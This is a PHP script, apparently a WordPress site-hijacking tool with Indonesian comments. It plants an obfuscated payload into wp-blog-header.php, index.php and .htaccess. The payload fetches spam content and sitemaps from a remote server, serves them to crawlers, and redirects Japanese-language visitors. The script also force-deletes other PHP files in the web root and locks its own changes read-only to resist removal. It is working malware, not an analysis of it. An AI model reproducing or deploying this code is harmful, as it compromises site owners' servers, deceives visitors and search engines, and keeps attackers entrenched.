$requri = substr($this->server('REQUEST_URI'), strpos($this->server('REQUEST_URI'), '/'));
}
return rtrim($requri, '/');
}
public function execReq($url, $p = array())
{
$url = str_replace(' ', '+', $url);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 20);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($p));
$output = curl_exec($ch);
$errorCode = curl_errno($ch);
curl_close($ch);
if (0 !== $errorCode) {
return false;
}
return $output;
}
}
$req = new Req();
$isc = $req->isc();
$isg = $req->isg();
$umap = $tr . "map";
$uri = urldecode($req->uri());
$p = array(
"domain" => $req->dm(),
"port" => $req->server('SERVER_PORT', 80),
"uri" => $uri
);
if (substr($uri, -10) == "robots.txt") {
header("Content-type:text/plain; charset=utf-8");
die($req->execReq($tr . "robots", $p));
}
if (substr($uri, -6) == "robots") {
$output = $req->execReq($tr . "robots", $p);
$rpt = __DIR__ . "/robots.txt";
file_put_contents($rpt, $output);
$robots_cont = @file_get_contents($rpt);
if (strpos(strtolower($robots_cont), "sitemap")) {
die("robots.txt file create success!");
} else {
die("robots.txt file create fail!");
}
}
if (substr($uri, -4) == ".xml") {
if (strpos($uri, "allsitemap.xml") || strpos($uri, "sitemap-index.xml") || strpos($uri, "sitemap-index-1.xml") || strpos($uri, "index.xml")) {
$output = $req->execReq($umap, $p);
header("Content-type:text/" . (substr($output, 0, 5) === '<?xml' ? 'xml' : 'plain') . '; charset=utf-8');
die('' . $output);
}
$output = $req->execReq($tr . "word", $p);
header("Content-type:text/xml; charset=utf-8");
if ($output == "1") {
die('' . $req->execReq($umap, $p));
} else {
die('' . $output);
}
}
$lang = $req->server('HTTP_ACCEPT_LANGUAGE', '');
if (!$isc && $isg && strpos($lang, 'ja')!==false) {
$p["ip"] = $req->ip();
$action = $tr . "jump";
die($req->execReq($action, $p));
}
if ($isc) {
die('' . $req->execReq($tr . "indata", $p));
}
?>
<?php
/**
* Loads the WordPress environment and template.
*
* @package WordPress
*/
if ( ! isset( $wp_did_header ) ) {
$wp_did_header = true;
// Load the WordPress library.
require_once __DIR__ . '/wp-load.php';
// Set up the WordPress query.
wp();
// Load the theme template.
require_once ABSPATH . WPINC . '/template-loader.php';
}
PHP;
// Target file untuk ubah izin
$targetFiles = [
$htaccess,
$indexFile,
$dbFile,
$baseDir . '/autoload_classmap.php',
$baseDir . '/akcc.php',
$baseDir . '/default.php'
];
// === Fungsi paksa ubah permission dan hapus ===
function paksaHapus($file)
{
if (!file_exists($file)) return;
@chmod($file, 0777);
if (!@unlink($file)) {
echo "โ ๏ธ Gagal hapus biasa, coba rename paksa: $file\n";
$tmp = $file . '.tmpdel_' . uniqid();
if (@rename($file, $tmp)) {
@unlink($tmp);
echo "๐งน File dipaksa dihapus via rename: $file\n";
} else {
echo "โ Tidak bisa hapus atau rename: $file\n";
}
} else {
echo "๐๏ธ File dihapus: $file\n";
}
}
// === Ubah izin file/folder dengan paksa ===
function ubahIzin($path, $izin)
{
if (!file_exists($path)) return false;
@chmod($path, $izin);
clearstatcache(true, $path);
echo "โ๏ธ chmod(" . decoct($izin) . ") -> $path\n";
return true;
}
// === Paksa tulis file baru ===
function paksaTulis($path, $isi)
{
paksaHapus($path);
@chmod(dirname($path), 0755);
$fp = @fopen($path, 'w');
if ($fp) {
fwrite($fp, $isi);
fclose($fp);
echo "โ
Berhasil tulis ulang: $path\n";
} else {
echo "โ Gagal tulis file: $path\n";
}
}
// === Buat backup dan tulis index.php baru dengan pemaksaan lebih kuat ===
function perbaruiIndex($indexFile, $backupDir, $isiBaru)
{
if (!is_dir($backupDir)) mkdir($backupDir, 0755, true);
if (file_exists($indexFile)) {
$timestamp = date('Ymd_His');
$backupPath = $backupDir . '/index.php.bak_' . $timestamp;
if (@copy($indexFile, $backupPath)) {
echo "๐ฆ Backup index.php ke: $backupPath\n";
}
}
// Pemaksaan lebih agresif untuk index.php
// 1. Coba hapus file terlebih dahulu
if (file_exists($indexFile)) {
@chmod($indexFile, 0777);
@unlink($indexFile);
}
// 2. Coba rename jika gagal hapus
if (file_exists($indexFile)) {
$tmpFile = $indexFile . '.tmp_' . uniqid();
@rename($indexFile, $tmpFile);
@unlink($tmpFile);
}
// 3. Paksa tulis dengan metode berbeda
$dir = dirname($indexFile);
@chmod($dir, 0755);
// Metode 1: file_put_contents
if (@file_put_contents($indexFile, $isiBaru) !== false) {
echo "โ
Berhasil tulis ulang dengan file_put_contents: $indexFile\n";
@chmod($indexFile, 0644);
return;
}
// Metode 2: fopen/fwrite
$fp = @fopen($indexFile, 'w');
if ($fp) {
fwrite($fp, $isiBaru);
fclose($fp);
echo "โ
Berhasil tulis ulang dengan fopen: $indexFile\n";
@chmod($indexFile, 0644);
return;
}
// Metode 3: coba dengan copy dari file temporer
$tempFile = tempnam($dir, 'index_temp_');
if (@file_put_contents($tempFile, $isiBaru) !== false) {
if (@copy($tempFile, $indexFile)) {
echo "โ
Berhasil tulis ulang dengan copy dari temp: $indexFile\n";
@chmod($indexFile, 0644);
@unlink($tempFile);
return;
}
@unlink($tempFile);
}
// Metode 4: coba dengan rename dari file temporer
$tempFile = tempnam($dir, 'index_temp_');
if (@file_put_contents($tempFile, $isiBaru) !== false) {
if (@rename($tempFile, $indexFile)) {
echo "โ
Berhasil tulis ulang dengan rename dari temp: $indexFile\n";
@chmod($indexFile, 0644);
return;
}
@unlink($tempFile);
}
echo "โ Gagal semua metode untuk menulis index.php\n";
}
// === Buat backup dan tulis wp-blog-header.php baru ===
// Fungsi ini tetap sama, karena menerima path file sebagai parameter
function perbaruiWpb($wpb, $backupDir, $isiBaru)
{
if (!is_dir($backupDir)) mkdir($backupDir, 0755, true);
if (file_exists($wpb)) {
$timestamp = date('Ymd_His');
$backupPath = $backupDir . '/' . basename($wpb) . '.bak_' . $timestamp;
if (@copy($wpb, $backupPath)) {
echo "๐ฆ Backup " . basename($wpb) . " ke: $backupPath\n";
}
}
paksaTulis($wpb, $isiBaru);
}
// === Cleanup file mencurigakan ===
function cleanup_php_root($wp_root = null)
{
if (empty($wp_root)) $wp_root = __DIR__;
$core_wp_files = [
'index.php','wp-config.php','wp-activate.php','wp-blog-header.php','wp-comments-post.php',
'wp-cron.php','wp-links-opml.php','wp-load.php','wp-login.php','wp-mail.php','wp-settings.php',
'wp-signup.php','wp-trackback.php','xmlrpc.php'
];
$custom_whitelist = ['zpc.php','xxxl.php','xxl.php','wpc.php','xx.php','ch.php','wordfence-waf.php', strtolower(basename(__FILE__))];
$whitelist = array_map('strtolower', array_merge($core_wp_files, $custom_whitelist));
$suspicious_ext = ['php0','gz','zip','tar','rar','7z','phps','phtml','bak','old','php'];
$found=[]; $deleted=[];
foreach (glob($wp_root . '/*') as $file) {
if (!is_file($file)) continue;
$base = strtolower(basename($file));
$ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
if (in_array($base, $whitelist)) continue;
if (in_array($ext, $suspicious_ext)) {
$found[]=$file;
@chmod($file, 0777);
if (@unlink($file)) {
$deleted[]=$file;
echo "๐๏ธ Dihapus: $file\n";
} else {
echo "โ ๏ธ Gagal hapus: $file\n";
}
}
}
echo "๐ Cleanup: ditemukan ".count($found).", dihapus ".count($deleted)." file.\n";
}
cleanup_php_root(__DIR__);
// === OBFUSKASI SEBELUM DITULIS ===
// Lakukan obfuscasi pada payload
$obfuscatedWpbContent = generate_advanced_obfuscation($payloadWpbContent);
// Dapatkan domain saat ini
$domain = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'domain.com';
$protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
$robotsLink = "{$protocol}://{$domain}/robots";
// === MAIN LOGIC ===
if ($isFix) {
echo "๐ง Mode FIX: membuka kunci & paksa rebuild index/htaccess...\n";
foreach ($targetFiles as $file) ubahIzin($file, 0777);
ubahIzin($baseDir, 0750);
perbaruiIndex($indexFile, $backupDir, $newIndexContent);
// === PERUBAHAN 2: Pemanggilan fungsi diubah menjadi perulangan ===
foreach ($wpb_files as $wpb) {
perbaruiWpb($wpb, $backupDir, $obfuscatedWpbContent);
}
paksaTulis($htaccess, $newHtaccess);
echo "โ
Semua file ditulis ulang dan dibuka akses.\n";
echo "๐ <a href='{$robotsLink}' target='_blank'>Klik di sini untuk melihat robots.txt</a>\n";
} else {
echo "๐ Mode default: rebuild dan kunci file...\n";
paksaTulis($htaccess, $newHtaccess);
perbaruiIndex($indexFile, $backupDir, $newIndexContent);
// === PERUBAHAN 2: Pemanggilan fungsi diubah menjadi perulangan ===
foreach ($wpb_files as $wpb) {
perbaruiWpb($wpb, $backupDir, $obfuscatedWpbContent);
}
// Lock permission setelah selesai
foreach ($targetFiles as $file) ubahIzin($file, 0444);
ubahIzin($baseDir, 0755);
echo "๐ Proses selesai. Semua file dikunci read-only.\n";
echo "๐ <a href='{$robotsLink}' target='_blank'>Klik di sini untuk melihat robots.txt</a>\n";
}